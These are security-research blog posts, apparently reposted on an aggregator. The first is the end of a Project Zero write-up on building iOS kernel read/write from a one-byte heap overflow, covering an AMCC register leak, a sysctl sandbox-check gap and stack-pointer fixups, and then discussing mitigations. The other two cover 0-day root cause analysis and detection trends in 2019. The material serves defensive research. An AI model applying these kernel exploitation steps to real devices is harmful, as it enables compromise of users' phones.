IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.
I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.

Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)The back gate is closedAfter finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.
iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.
If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.
Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.The taming of sysctlAt this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.
I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.
XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache line size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.
The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then  reads that address.

Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.
However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:
// Sandbox check sysctl-readret = sb_evaluate(sandbox, 116u, &context);if ( !ret ){    // Sandbox check sysctl-write    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )        ret = sb_evaluate(sandbox, 117u, &context);    else        ret = 0;}
For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.
As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", which is a writable sysctl used to convert the string-name of a sysctl into the numeric form, which is faster to look up. It is used to implement sysctlnametomib(). So it makes sense that this sysctl should usually be writable.
The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyways, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.III - The Return of the CopyoutThe battle of pmap fieldsWe have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.

There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.
We will address the pmap/vm_map conflict first.
Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.
static voidvm_map_copy_insert(    vm_map_t        map,    vm_map_entry_t  after_where,    vm_map_copy_t   copy){    vm_map_entry_t  entry;
    while (vm_map_copy_first_entry(copy) !=               vm_map_copy_to_entry(copy)) {        entry = vm_map_copy_first_entry(copy);        vm_map_copy_entry_unlink(copy, entry);        vm_map_store_entry_link(map, after_where, entry,            VM_MAP_KERNEL_FLAGS_NONE);        after_where = entry;    }    zfree(vm_map_copy_zone, copy);}
Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.
Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:
panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"
The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.
Due to PPL, we can not update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.The fires of stack doomFinally, it is time to break vm_map_copyout_internal() out of the for loop.
    for (entry = vm_map_copy_first_entry(copy);        entry != vm_map_copy_to_entry(copy);        entry = entry->vme_next) {
The macro vm_map_copy_to_entry(copy) expands to:
    (struct vm_map_entry *)(&copy->c_u.hdr.links)
Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.
The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's  vme_next to point to &copy->c_u.hdr.links. and then update the "done" entry's vme_next to point to the overlay entry.

The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of  type ENTRY_LIST:
    zfree(vm_map_copy_zone, copy);
However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.
Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!
FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]FFFFFFF007C599A8     LDR     X25, [X28,]FFFFFFF007C599AC     CMP     X25, X27FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98...                             ; The for loopFFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr]FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]
This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.

At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.Homeward boundFinally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.
Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.
When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.
The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.
It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.

At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the fields.
After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.
Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.The mitigating of the ShireSo, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?
The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.
First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that you do need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once you have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons: First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.
The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.
Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.
PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.
Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.
However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.
The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.
In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.
Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.
In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.
However, if the use of zone_require were expanded, it is possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow."Appendix A": Annals of the exploitsIn my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.
Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".
That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.
All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.
Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)"Appendix B": ConclusionsI'll conclude by returning to the three questions posed at the very beginning of this post:
Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?
These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.
To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and in my personal opinion, I expect there are other as-yet unpublished techniques that are also equally good.
To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.
Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.IndicesOne final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:
An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.
This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.
I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.
Kategorie: Hacking & Security

Root Cause Analyses for 0-day In-the-Wild Exploits

29 Červenec, 2020 - 19:27
Posted by Maddie Stone, Project Zero
When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. 
Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we’re publishing some in bulk now to play “catch-up”, in the future we plan to post each one in a timely manner after it’s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. 
We’ve added a new column to the “0day In the Wild” tracking spreadsheet that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.
0-Day Exploit Root Cause Analyses
For each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we’d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our template and publish this information about 0-days they detect and/or analyze! 
When completing a root cause analysis we focus on the following areas.
  • Bug class
  • Details of the vulnerability, such as how to trigger, what it allows, etc.
  • Exploit method and whether or not it’s a known method
  • Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)
  • Any historical, present, and future bug context such as previous related bugs
  • Areas for variant analysis and any found variants
  • Structural improvements
    • Can you also kill the entire bug class?
    • Is there a way to make it much harder to exploit?
  • Potential detection methods for similar 0-days
    • Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from “indicators of compromise” because we’re focusing on detecting while it’s still a 0-day.

We selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.
Out of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we’re publishing here today. These are 5 out of the 6 of the 0-days detected in August or later of 2019 (when I joined the team and started this initiative ). In addition, we’re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with Google's Threat Analysis Group, and a Firefox 0-day that Project Zero had reported to Firefox, that was also discovered independently in-the-wild.

These RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. 
Our hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming andmore difficult for attackers to use 0-days in the wild. Please reach out with any feedback and/or suggestions and we hope that others will also begin publishing information from the RCA template in the future.
Kategorie: Hacking & Security

Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019

29 Červenec, 2020 - 19:27
Posted by Maddie Stone, Project Zero
In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019. 
When I had the idea for this “Year in Review” blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there’d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or… but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected. 
The rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.The BasicsIn 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping here.  This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. 

The largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don’t know the true detection rate of all 0-day exploits, it’s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we’d clearly know that to be false.
All of the 0-day exploits detected in 2019 are detailed in the Project Zero tracking spreadsheet here
0-days by VendorOne of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. 
While Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it’s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft’s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found.

Microsoft Deep-DiveFor 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it’s worthwhile to dive into the Microsoft bugs to see what we can learn since it’s the only platform we have a decent sample size for. 
Of the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows . All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it’s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. 
Out of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.
Even just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?
CVEWindows 7 SP1Windows 8.1Windows 10Win 10 1607WIn 10 1703WIn 10 1803Win 10 1809Win 10 1903Exploitation of Latest SW Release?ComponentCVE-2019-0676XXXXXXX
Yes (1809)IECVE-2019-0808X

N/A (1809)win32kCVE-2019-0797
Exploitation Unlikely (1809)win32kCVE-2019-0703XXXXXXX
Yes (1809)Windows SMBCVE-2019-0803XXXXXXX
Exp More Likely (1809)win32kCVE-2019-0859XXXXXXX
Exp More Likely (1809)win32kCVE-2019-0880XXXXXXXXExp More Likely (1903)splwow64CVE-2019-1132X

N/A (1903)win32kCVE-2019-1367XXXXXXXXYes (1903)IECVE-2019-1429X
XXXXXXYes (1903)IECVE-2019-1458XXXX

N/A (1909)win32k
Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429While this blog post’s goal is not to detail each 0-day used in 2019, it’d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor according to Google’s Threat Analysis Group (TAG)
Our root cause analysis provides more details on these bugs, but we’ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was “fixed” as CVE-2019-1367, but it turns out the patch didn’t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric (P0 1947). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft’s patch was again incomplete. This issue was patched as CVE-2020-0674. 
A more thorough discussion on variant analysis and complete patches is due, but at this time we’ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can’t give attackers four chances at the same bug. Memory Corruption63% of 2019’s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-free’s being a common target is nothing new. “Smashing the Stack for Fun and Profit”, the seminal work describing stack-based memory corruption, was published back in 1996. But it’s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there’s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don’t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable then logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don’t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same because in their nature they’re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns.
Even if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.More Thoughts on DetectionAs we’ve discussed up to this point, the same questions posed in the team's original blog post still hold true: “What is the detection rate of 0-day exploits?” and “How many 0-day exploits are used without being detected?”. 
We, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don’t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there’s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection..
